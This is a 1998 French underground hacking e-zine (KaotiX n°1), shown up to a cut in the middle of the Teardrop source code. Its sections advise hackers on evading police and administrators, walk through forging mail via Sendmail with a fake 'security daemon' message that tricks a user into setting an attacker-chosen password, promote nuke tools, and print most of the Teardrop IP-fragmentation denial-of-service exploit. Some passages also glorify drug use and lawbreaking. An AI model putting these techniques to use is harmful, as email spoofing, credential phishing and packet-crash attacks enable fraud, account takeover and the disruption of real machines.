# tHe nEtWoKed BrAiN hAcKeRs cOrp. 
# klh@mygale.org

presents...             








                                    /\
                                   / /
        __           <|==|>      >> <<                  
        \ \    /\      ||        / /      _/\_        /|
         \ \  /  \_____||       . .     _/    \_     / |
          \ \/           \__@__/   \___/        \___/ /__________
          /    __ ____  __    ____ _________ ___  ___  _________/
         !    |  |   / /  \  / __ \__   ___/|\  \/  /  |
 _______/     |     / / O  \| (__) | | | |  | \    /    \
/________     |     \/      \      | | | |  | /    \     \___
         \    |__|___\__|____\____/  |_| |__|/__/\__\     __////
         /                                               /
        / /\___      __________    _____                /
       /_/     |     \         \  /     \_      ______/
               |     /          \/        \_   _/   
               |    |                       \_/
               !!!!!!                        |
                !!!!                       <-.->
             ____!!__________________________|___________
            /                                            \
           /         ** Le EziNe cYbErPuNk! **            \
          /                                                \
          \            KOs aNd cYbErCuLtUre!               /
           \______________________________________________/

                  [ KaotiX N°I - edit 2 - juin98 ]






                                                     -=[iXtlan]=-
                                                       (k)1998


<<[ EDITO ]>>
-------------

KaotiX est un E-zine (Electronic Fanzine) sur le hack, la cyberculture et les cyberpunks, la techno (teknival et free parties only), internet et le monde des rezos...l'underground subversif !

Depuis l'arrive en masse du grand public sur le monde des rezos planetaires (internet)les choses ont bien changées! Les keufs sont de plus en plus présents, verifiant les connexions, harcelant les ISP (internet service provider) pour qu'ils donnent le nom de tel ou tel individu considéré comme un hacker (pirate)et dont la police aimerait bien voir les activites cessées. Le pire c'est que la loi francaise oblige les ISP et societes d'hebergement de sites webs a connaitre les noms et adresse des personnes qu'elles hebergent et a les donner
aux autorités sur simple demande de celles ci!
Donc soyez vigilant! si vous lisez ce texte c'est que a priori la scene du hackin et la contre culture vous interessent, raison de plus pour surveiller vos arrieres!

voici quelques articles qui j'espere vous interesseront et ferrons peut etre changer votre facon de voir les choses, le monde, internet, les autres...
Et n'oublies pas que si le hackin est interdit c'est parcequ'il procure une sensation de liberté que les hautes spheres teknokrates de notre societe ne peuvent pas supporter (surment a cause de balai qui leur est reste coince dans le cul).Le hacker est comme un junkie, sauf que lui sa dope c'est la connexion, le web,le telnet, les systems d'exploitation et leur divers faillent qui lui permettent de zoner sur les serveurs du monde entier... 

***kEeP oN hAcKiN aNd gEt sToNeD oF cOuRsE ;-)

#-:[ NOTA ]:-#
Si vous voulez recevoir les prochain numeros de KaotiX inscrivez vous sur la mailing list enenvoyant un mail a klh@mygale.org en parlant un peu de vous de ce que vous faites (ou voulez faire), histoire de verifier que vous n'etes pas de la poulice....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



                  ---------------------------------- 
                  |   *** TABLE DES MATIERES ***   |
                  ----------------------------------




[ N° ]--------[ TITRE ]----------------------------------
  00       #   disclaimer!
  01       #   cyber parano ou comment rester libre
  02       #   comment hacker le SMTP d'un Unix
  03       #   Spiral 23 Tribe en France (faites la teuf!)
  04       #   les Nukers comment ca marche ?
  05       #   virus (code sources et compilation)
  06       #   IRC takeover et autres astuces
  07       #   hacker un user sur unix 
  08       #   les dernieres conneries de microsoft
  09       #   comment cracker un password
  10       #   .htaccess (et ses failles)
  11       #   tools for a GNU generation
  12       #   da cyberpunk revolution
  13       #   comment planquer ses données
  14       #   the ANIRAE project for a free cyberspace...
  
  15       #   LinkZ on Da wEb ;P)  
  16       #   remerciements...





Bon voila pour KaotiX n°1, la suite dans le n°2 a paraitre je sais pas trop quand... ;-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#00#

                      ¤¤¤[ DISCLAIMER ]¤¤¤
               (lisez ca avant de lire la suite!)


Cette cyber publication est la a titre d'information, si vous utilisez son contenu  dans un but mal intentionne, c'est pas ma faute! c'est vous qui agissez et si vous voulez me poursuivre pour incitation a des actes illegaux alors aller vous faire... ok?!:)

Le hacker n'a pas pour but de foutre en l'air un system mais simplement de le parcourir, donc evitez tout acte nefaste pour le system (c'est pas tres cool pour ceux qui doivent le gerer...)

Toutes les informations et sources contenues dans ce numero sont la a titre informatif, KaotiX ne garanti donc en aucun cas l'utilisation qui peut etre fait des divers exemples sites! De plus ce document s'adresse a des personnes censées et dont l'intellect s'eleve un peu plus haut que celui des keufs et autres enculés affiliés a l'administration francaise (ou etrangere). Si vous etes un keufs, ne lisez pas ce document (en tout cas je vous aurez prevenu) et le fait que vous le lisiez constiturai donc un violation des lois sur le copyright et la proprieté intellectuelle.....

!!! FRENCH POLICE SUCKS !!!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#01#



          ___________________________
         /                           \------------//----//-----\\-0
        <      * CYBER PARANO *       >----------//----//------//-0
         \___                     ___/----------//-----\\------\\-0
             \ ou comment rester /-------------//-------\\-----//-0 
              \___   libre   ___/-------------//---------\\----\\-0
                  \_________/----------------//-[ixtlan98]\\---//-0





S'il y a bien quelque chose qu'il faut eviter quand on a des pratiques illegales c'est de se faire prendre! voici donc quelques petits conseils pour vous eviter un jour de vous retrouver face a des individus bizzaroides aux noms evocateurs de commissaires, inspecteurs, brigadiers, sergents (aussi couramment appellés keufs, condes, flicailles, poulets, batards, et d'autres diminutifs tout aussi charmants que rassurants :)

Tout d'abord il faut TOUJOURS appliquer les quelques règles de bases suivantes, ce qui deja vous evitera d'etre chopper par des admins trop curieux!

 1. Ne jamais devoiller son nom (utilisez un pseudo)
 2. Ne jamais donner (meme a des personnes en qui ont a confiance)             son numero de telephone ou son adresse...
 3. N'utilisez pas l'email de votre provider pour faire transiter des         infos a tenances illegales! 
 4. Ne frimez pas du genre "oui j'ai reussi a hacker tel ou tel         server!"
 5. encryptez toutes données piratées sur un serveur et planquez les             dans des repertoire cachés (cf. article n°13)
 6. en FTP tjrs utiliser un login anonyme
 7. n'acceptez pas les cookies (JavaScripts ou CGI)
 8. ne mettez pas votre email dans le mailer de votre browser !!!
 9. deconnectez vous a la moindre alerte
10. n'avouez jamais avoir commis tel ou tel delit et ne signez jamais             une deposition avant de l'avoir lue et relue et relue (ce qui         fera bien chier les keufs!! hehe :)

voila les dix commandements qu'un hacker doit savoir suivre s'il veut rester libre! Ca a l'air con comme ca mais les hackers qui sont en taule ont tjrs ete pris parcqu'ils ont failli a une de ces regles! alors ne deconnez pas et pensez tjrs qu'il vaut mieux abandonner plutot que d'etre en taule (enfin c'est mon avis en tous cas !)

Bon maintenant que vous connaissez les regles voici comment faire pour les appliquer:

Il faut tjrs utilisez un pseudo, de preference un qui vous designe et qui fera que vos potes puissent vous reconnaitre (evitez donc les pseudos du style 'bob', 'bill' ou 'toto')... Ne signez jamais vos mails avec votre vrai nom et si vous aller sur IRC verifier bien votre RealName!
Les clients IRCII et BitchX vont par defaut vous appliquer comme RealName les donnees saisies par l'admin lorsqu'il vous a ouvert un compte... Ainsi il n'est pas rare de voir debarquez quelqu'un sur IRC et lorsqu'on fait un /whois sur son nick le client nous donne son vrai nom! pour cela il faut exporter la variable
REALNAME et lui donné une autre valeur. Voici comment faire pour IRCII et BitchX (qui sont les clients unix les plus repandus!)
loggez vous en telnet et taper au prompt

% set REALNAME="nouvelle_valleur"
% export REALNAME

(le nom de la variable doit toujours etre en majuscule)
il est possible que selon le shell que vous utilisez (bach, zsh, ksh, csh) la commande 'export' pose des problems. Dans ce cas editez votre fichier '.bashrc'(dans le cas de l'utilisation du shell bourne) dans un editeur type emacs ou vi et ajoutez la ligne suivante:

export REALNAME="nouvelle_valeur"

Note: le fichier .bashrc (ou .cshrc, .kshrc, .zshrc,...) est un fichier cache car il commence par '.' pour le lister tapez
% 'cd ~'    (retour dans le homedir)
% 'ls -al'  (liste tous les fichiers)

Bon voila comment faire pour eviter d'etre repere sur IRC... il est aussi preferable d'utiliser une IP dynamic ce qui compliquera la tache de quiconque qui essayerait de vous localiser!

En ce qui concerne l'Email, il est vivement deconseiller (tres vivement meme) de faire transiter des infos a caractère illégal via l'email que vous a attribué votre provider (car celui ci est tenu par la loi de communiquer tous les renseignements vous concernant aux autorités si elles le demande!)Pour pallier a ce problem vous pouver ouvrir un compte email sur un serveur gratuit (il y a en a de plus en plus sur le web) comme par exemple
     
--[URL]-------------[email]--[espace]--[smtp]---[qualite]
www.mygale.org        oui      10Mo     non       *****
www.geocities.com     oui       1Mo     oui       ***
www.chez.com          oui       5Mo     oui       **
www.altern.org        oui       5Mo      ?        ****

                
en plus d'un compte sur le www et d'un ftp ils vous fourniront une adresse email accessible en POP3. Il est aussi recommandé d'encoder toutes les données qui transiteront via le reseau (mot de passe, compte FTP, adresse www, et autres) en utilisant un encoder du type UUENCODE ou PGP (les sources de ces encoders sont sur le web) le mieux etant encore de creer son propre encoder en utilisant un protocole de codage connu uniquement de vous et celui a qui vous faites passer l'info ; par exemple remplacer chaque lettre par la son numero (A=0 B=1 C=2..) multiplie par la date d'envoie du courrier.... (1juin98 = 010698)Ainsi vous pouvez etre sure que personne ne decodera votre message :-)

Il est tres facilement possible de creer un encodeur/decodeur en faisant un fichier batch ou shell (suivant l' OS utilise:-)

bon voici un ptit protocole d'encodage qui pourrait vous etre utile:

         A= 01    K= 11    U= 21    4= &4
         B= 02    L= 12    V= 22    5= &5 
         C= 03    M= 13    W= 23    6= &6
         D= 04    N= 14    X= 24    7= &7
         E= 05    O= 15    Y= 25    8= &8
         F= 06    P= 16    Z= 26    9= &9
         G= 07    Q= 17             0= &0
         H= 08    R= 18    1= &1
         I= 09    S= 19    2= &2
         J= 10    T= 20    3= &3


jusque la c'est plutot simple mais tout ce complique qd on mutliplie
chaque lettre par la date 
ainsi en considerant que nous sommes le 01 juin 98:

A= 01 x 010698 = 010698   (A tjrs egal a la date)
B= 02 x 010698 = 021396
C= 03 x 010698 = 032094
etc...

les chiffres seront codés de la meme facon precedes de '&' soit
1 = &1 x 010698 = &010698 
2 = &2 x 010698 = &021396
3 = &3 x 010698 = &032094

pour une bonne comprehension on separe chaque lettre par un '/' et chaque mot par par un retour a la ligne...chaque lettre est codee sur 6 caracteres (les chiffres etant precedes d '&')

bon aller petit exercice de comprehension! decodez moi cette phrase en sachant que la date est le 1er juin 98 ;-)

064188/192564/053490/149772/032094/085584/
171168/160470/128376/096282/032094/053490/
203262/224658/032094/117678/203262/

Si vous avez trouve envoyez un mail a klh@mygale.org avec la reponse et qui sait vous gagnerez peut etre un voyage sur la Lune ?!;)

voila pour l'encryptage :)

Mais il y a d'autre moyens de se faire reperer le plus courant etant d'oublier certains fondements de base du manuel de survie du parfait petit hacker!
Ne concentrez jamais les infos vous concernants au meme endroit!!!
C'est pourquoi il est vivement déconseiller de mettre son adresse email dans le mailer du browser. De meme il est tres mauvais d'accepter les cookies (qu'ils soient JavaScript ou CGI).
En effet un serveur FTP bien ficele qui recoit la visite d'un client FTP anonyme (ex:Netscape) connaitra l'IP de celui ci et pourra lancer une recherche d'ident sur la couche TCP/IP du provider utilisé... 
Si le visiteur utilise un client IRC en meme tmp, le serveur FTP connaitra desormais son IP et son user ce qui est suffisant pour reconstituer l'email en question...(c'est comme ca que les listes
de spams se crées a cause de visiteurs qui ne font pas attention!)

Voila c'etait la partie pour les parano du rezo :) mais c'est en etant trop parano qu'on evite de finir dans une cage ou face a la brigade de repression des fraudes et d'application de la loi "informatique et liberte"... alors n'oubliez pas de faire attention a ce que vous faites et deconnectez vous a la moindre alerte!



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#02#   




      =============\                             /===============
            _______\\___________________________//__________
           /                                                \
          []     -[ COMMENT  HACKER LE SMTP D'UN UNIX ]-    []
           \________________________________________________/





# NOTE:
# Cet article est tiré d'un article de Noway (Ezine underground de  # hack paru sur le rezo francais en 1994) ecrit par NeurAlien ;-)

Bon le principe est simple et requiert un minimum de connaissance dans le monde des systems Unix (si vous n'utilisez que fenetre95 alors sautez cette section ou meme aller vous couchez en oubliant ce que vous venez de lire! haha;-)

Bon sous unix le transfert de mail (SMTP= Simple Message Transfert Protocol) se fait via le module SendMail qui ecoute les messages des autres mailers et de ses clients via la port TCP numero 25

pour verifier ca, si vous me croyez pas, loggez vous sous le shell:

% grep smtp /etc/service

voila ce ki devrait apparaite alors :
smtp            25/tcp          mail

voila donc comment proceder pour envoyez un faux email via le SMTP de votre system... faites un telnet sur votre serveur en utilisant le port 25, soit:

% telnet localhost 25

[ dans ce qui suit ce qui est tape au clavier commence par >>> ]
[ DaubeNet etant le nom fictif d'un serveur pas si fictif que  ]
[ ca mais dont le DNS restera anonyme ! ;-) hehe....           ]

----------------
DaubeNet {102} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to machine.server.fr
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 01 June 98 03:51:55 -0600
220 ESMTP spoken here
>>>help
214-Commands:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail@CS.Berkeley.EDU.
214-For local information send email to Postmaster at your site.
214 End of HELP info
>>>help helo
214-HELO <hostname>
214-    Introduce yourself.
214 End of HELP info
>>>help mail
214-MAIL FROM: <sender>
214-    Specifies the sender.
214 End of HELP info
>>>help rcpt
214-RCPT TO: <recipient>
214-    Specifies the recipient.  Can be used any number of times.
214 End of HELP info
>>>help data
214-DATA
214-    Following text is collected as the message.
214-    End with a single dot.
214 End of HELP info
>>>help quit
214-QUIT
214-    Exit sendmail (SMTP).
214 End of HELP info
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

Bon voila donc comment ca marche:
"Helo"         vous presente 
"mail from"    designe l'adresse fictif que vous voulez employer
"rcpt to"      designe la personne a qui envoyer le mail

----------------------
DaubeNet {103} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to machine.server.fr
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
220 ESMTP spoken here
>>>helo ducon.fbi.com
250 DaubeNet Hello machine.server.fr[127.0.0.1], pleased to meet you
>>>mail from: root@ducon.fbi.com
250 root@ducon.fbi.com... Sender ok
>>>rcpt to: fred@machine.server.fr
250 fred@machine.server.fr... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>
>>>Please, would you stop playing with my Unix system otherwise i'll
>>>send a wet operation commando to your university.
>>>
>>>Nigel X.
>>>System Administrator at FBI Inc.
>>>root@fbi.com
>>>.
250 DAA00299 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

hahaha le fred@machine.server.fr va avoir la trouille de sa vie :) hehe... voila ce qu'il va voir en se loggant sur son shell :

----------------------
DaubeNet {104} >>> mail
Mail version 5.5 6/1/90.  Type ? for help.
"/var/spool/mail/fred": 1 message 1 new
>N  1 root@ducon.fbi.com    Thu Sep 15 03:55  14/508  
& >>>1
Message 1:
From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
From: root@ducon.fbi.com
Apparently-To: fred                     

Please, would you stop playing with my Unix system otherwise i'll
send a wet operation commando to your university.

Nigel X.
System Administrator at FBI Inc.
root@fbi.com

---------
hmmm toutefois l'astuce n'est pas parfaite car le "Apparently-To" ne fait pas tres credible! d'ou la petite bidouille a faire qui rendra votre mail parfaitement coherent :) 
Il suffit de mettre dans le corp du mail (apres la commande 'data')
en premiere ligne du message 
"To: fred@machine.server.fr"

voici en detail l'operation parfaite:
----------------------
DaubeNet {105} >>> telnet localhost 25
Trying 127.0.0.1...
Connected to machine.server.fr
Escape character is '^]'.
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
220 ESMTP spoken here
>>>helo
250 DaubeNet Hello machine.server.fr [127.0.0.1], pleased to meet you
>>>mail from: root@fbi.com
250 root@fbi.com... Sender ok
>>>rcpt to: fred@machine.server.fr
250 fred@machine.server.fr... Recipient ok
>>>data
354 Enter mail, end with "." on a line by itself
>>>To: fred@machine.server.fr
>>>
>>>Good afternoon,
>>>
>>>    Could you please stop playing with my unix system otherwise        >>>    i'll be forced to send one of our wet operations' commando to >>>    execute you.
>>>
>>> Nigel X, System Administrator at Fbi Inc.
>>>.
250 DAA00307 Message accepted for delivery
>>>quit
221 DaubeNet closing connection
Connection closed by foreign host.
----------------------

et voila le fred@machine.server.fr va recevoir un mail completement transparant et il croira vraiment recevoir un mail depuis root@ducon.fbi.com !!! 
En plus une telle manip vous rend indetecable puisque le "helo" lancé au server n'est suivi d'aucun argument, ce qui va faire donc que ce con de server se reconnaitra lui meme :) ehehe

voila de koi plaisanter pendant de bonnes heures avec ca :)

hacker le SMTP d'un serveur est interessant car il va vous permettre pas mal de petites libertes du genre mailer votre admin en l'engueulant quant a son incapacite technique a gerer le server ! (sans grand interet toutefois)mais aussi pourquoi pas a vous faire passer pour le deamon du systeme et a jouer de tous vos talents cachés pour recupérer des mots de passes sur les comptes
des autres utilisateurs :) hehe

voici un exemple qui a fait ses preuves plus d'une fois...
-------------------
faites un mail a un utilisateur choisi pour son incompetence technique sur unix en mettant en 
"mail from: security-daemon@machine.server.fr"
ensuite regardez bien le log de l'unix sur lequel tourne votre serveur (ici on prend comme exemple le Digital Unix OSF1...
--------
from: security-daemon@machine.server.fr
To: fred@machine.server.fr
Subject: security automated mailing

*** This is a automated generated mailing: do not reply! ***

The security daemon of Digital Unix OSF1 (machine.server.fr)
has found that your password is unsecure. You should change it
to "uX23-dmp0" otherwise your account will be disabled.
To change you password type "passwd" in your shell and follow
the instuctions.

Thank you
Security Daemon
--------

hehe ainsi l'utilisateur preplexe obeira sans comprendre aux ordres de la soit disante machine et changera son mot de passe en ce que vous lui avait dit :)
et voila comment gagner un peu d'espace sur les disks des autres (lol:) Il paraitrait meme que NeurAlien aurait reussi a faire changer son pass a un admin qui a cretinement obeit aux ordres de packages securitaires qu'il n'a meme pas installes! 
(vraiment con l'admin non? ?:)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#03#
          
                        SPIRAL 23 TRIBE EN FRANCE
                            (faites la teuf!)
 
                                   : 
                                  /9\  
                       :          n$X           :
                       ?L         $$B          :X       
                        $B<:     U$$$X        :X!
                        7$$N$   <R$$$@      :W$E
                         T$$$i:  @$$$&    :u$$$$
                          M$$$$: @$$$R  :t$$$$*
                 ^%$_      7"$$$:7$$$R:!@$$$*!    _$%^  
                   ~$$$N$*%_\9$$$/R$$!$$$*:/_%$$$$*~ 
                      *$$$$$*WX!$N~$FtW#Xd$$$$$*
                       _   ^^^%$$$%%%%$$$%^^^   _
                        ^^%%##%%#$$$%%%$%%$$$%^^   
                             ~~~~^:$$:^~~~~  
                                   X# 
                                   ||  
                   !!! LEGALIZE FREE TEKNO MUZIK !!! 


par iXtlan (klh@mygale.org)
============================

Je sais pas si vous etes comme moi, mais j'ai tendance a tjrs me retrouver dans des plans illegaux? je sais pas si c'est par gout du risk mais dans tout ce que je fais je trouve un moyen d'aller contre la loi! Il faut dire aussi que les instances politiques et policieres francaises ont tendance a rendre illegal tous ce qui est fun: hack, phreak, drogues, teufs, teknival, etc...
Mais que faire? sois on rentre se coucher degoute de rater une occasion comme ca de faire la teuf... tout ca a cause de lois abjectes, soit on s'en fout et on va contre ces lois! moi j'ai deja choisi (hehe) et rien ne m'empechera d'aller en teuf, ou de hacker un system, ou de fumer de la 'rezine de kanabis' (comme dit le meilleur ami de l'homme: le keuf...)

Enfin voila koi:) Le retour des beaux jours annonce le retour des teknivals sur  le sol francais... "les teknikoi ???" diront certains et a eux je repliquerai "les TEKNIVALs bordel! tu sais les grosses teufs hardcore illegales mais tellement terribles, peuplés de tribues de travelers nomades qui zonent sur les sols européens a le recherche des meilleurs coins pour faire la teuf!"

he oui l'inconvenient (mais aussi le charme) de ces teufs c'est qu'elles sont illegales et donc que les trouver est tjrs une aventure palpitante! D'abord faut trouver l'infoline ce qui est faisable en degotant le fly ('flyer' pas les fly qu'on degote au cours de la teuf! lol) ou en interogeant les relations que l'on a dans le milieu des teufers... ensuite faut reussir a appeller cette ptin d'infoline (ce qui nous donne encore une raison de maudir france telecom)
quand on voit la mauvaise qualite des services locaux de telephonie!
L'infoline nous revelent en general un lieu de rendez vous du genre
"Rendez vous sous le pont machin, entre 22h et 3h du mat"... 
ahh cool mais c est ou la pont machin ?? (vu qu'on vient de se taper 300 bornes pour caller a cette teuf et qu'on debarque dans la ville on connait pas forcement tous les noms des ponts ! donc direction l'arret de bus le plus proche ou l'on trouve en general un plan de la ville .... au pire on peut tjrs demander aux indigenes locaux (style octogeneres bien peignes et effrayes par le look decadent des teufers qui viennent lui demander pour la quinzieme fois ou l'on peut touver
le pont machin!)
enfin apres moultes efforts et tracassements et a l'heure prevue on arrive a ce fameux pont pour la s'appercevoir que certes teufers il y a, mais aussi bcp de keufs squattent au bout de la rue regardant avec attention tout ce ptit monde s'agiter! Quoi qu'il en soit on va pas se gacher la teuf pour autant et un keum nous refile le plan pour aller jusqu'au lieu dit ou se deroule la teuf, yeah cool!

Et voila direction la Zone industrielle la plus proche pour y retourver les sounds systems et les teufers! Mais ont est tjrs loin de s'imaginer que a chaque fois il faut traverser des chemin cailleux (a peine si un 4x4 ose passer) rouler quelques dizaines de minutes dans la boue, en se disant "ptin c'est ou la teuf ?? on est dans un autre departement la".... puis finalement il est 2h du mat, on commence a se decourager quand on apercoit enfin les stroboscope au loin "hourraa!!!!" et oui c est tjrs le meme reconfort quand on trouve la teuf, les lights, et surtout le beat! Poum! Poum! Poum! un DJ mix un hardcore tonitruant (proche des 220bpm)l'endoit est magnifique, le ciel degagés et les etoiles scintillantes! en gros
ca vallait bien le detour koi :)
Et voila on est en teuf, a block sur le sound system, le corps se dechaine, et l'esprit se lache (il est vrai que les divers substances absorbées l'aide a partir dans tous les sens:)Et la deux options sont possibles: soit la teuf se deroule sans accros, nickel koi, noprob... soit les keufs arrivent et font cesser la zik ce qui est tjrs 
hautement dezagreable!

voila c'etait la chronique de teufs, surtout que cet ete y'a les Spiral en France et pas mal de bonnes dates:) (notament un tekni en republic tchek hehe)

en conclusion:   !!! FRENCH POLICE SUCKS !!!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#04#

                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                  @@@@@                       @@@@@
                  @@@@@      LES NUKERS       @@@@@
                  @@@@@                       @@@@@
                  @@@@@  comment ca marche?   @@@@@
                  @@@@@                       @@@@@
                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

(k)1998
[iXtlan]


Les Nukes sont des attaques lancés depuis un poste connectés sur internet vers un autres poste lui aussi connecte.
Ces attaques utilisent une faille dans le noyau de l'OS visé, ainsi les machines sous Win95/Nt sont extremement faciles a Nuker! Le Nuke envoie des 'packets' d'informations vers une IP (identifiant la machine visee) qui vont faire planter le CPU (incapable de gerer toutes ces infos en meme tmp).
Il existe plusieurs Nukers pour Windows le meilleur etant sans conteste la version 2 de WinNuke32 ecrit par Nuke2Kill: 

http://www.geocities.com/SiliconValley/Way/8056/

Cette version deux est en effet capable de planter n'importe quelle station sous windoze meme si celle ci est patchee! (le patche de microsoft etant un daube qui essaye veinement de pallier aux defaillance du system lui meme daube de chez daube!!!)

Si vous ne voulez pas etre nuker pas la peine d'installer 36 patches le seul moyen est d'installer LINUX!!!! (www.linux.org)
De plus l'installation de Linux (je vous conseil la distribution Debian ou RedHat) vous permettra de compiler les sources des meilleurs Nukers actuels que sont Teardrop, Newtear, Nestea, Octopus, NTsunKill, Bonk, Boink, etc...
(http://www.rootshell.com)

Ces nukers necessitent d'etre root pour etre installes donc le mieux est encore de recuperer un vieux 486 et d'installer Linux dessus! d'ailleurs vous pourrez vous servir de cette machine entant que Firewall pour votre rezo ce qui protegera  vos stations win;-) 
(en plus de ca vous pourrez vous debarrassez de votre WinGate qui est un prog certes bien utile mais n'assurant pas une securite adéquate: il existe plein de petits progs qui vont planter les wingates et ainsi deconnecter l'utilisateur!)

voici le source de Teardrop par route|daemon9  <route@infonexus.com> sans doute le meilleur nuke actuel!


/* 

Debut du source de Teardrop 

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x1c    /* datagram frame padding for first packet */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
                         */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
                break;
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
                break;
            case 'n':               /* number to send */
                count   = atoi(optarg);
                break;
            default :
                usage(argv[0]);
                break;              /* NOTREACHED */
        }
    }
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    return (0);
}

/*
 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
 */

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /*
     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
     */
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);   /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
